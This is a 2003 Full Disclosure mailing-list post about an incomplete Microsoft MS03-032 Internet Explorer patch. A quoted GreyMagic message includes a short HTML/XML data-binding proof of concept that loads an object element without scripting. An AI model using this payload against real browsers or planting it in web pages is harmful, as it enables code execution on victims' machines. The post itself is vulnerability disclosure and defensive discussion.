|
Full Disclosure
mailing list archives
RE: BAD NEWS: Microsoft Security Bulletin MS03-032
From: ADBecker () chmortgage com
Date: Mon, 8 Sep 2003 12:16:42 -0700
Updated antivirus software should catch this exploit and prevent any application from being launched.
We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/
Andrew Becker
C.H. Mortgage, D.R. Horton
Phoenix IT/MIS Department
Phone: (866) 639-7305
Fax: (480) 607-5383
"GreyMagic
Software" To: "NTBugtraq" <NTBUGTRAQ () LISTSERV NTBUGTRAQ COM>, "Bugtraq"
<security () greymag <bugtraq () securityfocus com>, <full-disclosure () lists netsys
com>,
ic.com> <vulnwatch () vulnwatch org>
cc: <http-equiv () excite com>, "Microsoft Security Response
Center"
09/08/03 07:52 AM <secure () microsoft com>, (bcc: Andrew D Becker/Continental Homes)
Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032
The patch for Drew's object data=funky.hta doesn't work:
This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
explains the problem in detail. Microsoft again patches the object element
in HTML, but it doesn't patch the dynamic version of that same element.
1. Disable Active Scripting
This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data=x.asp></object>
]]>
</exploit>
</security>
</xml>
Ouch.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
 By Date 
By Thread
Current thread:
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032, (continued)
| 
Intro
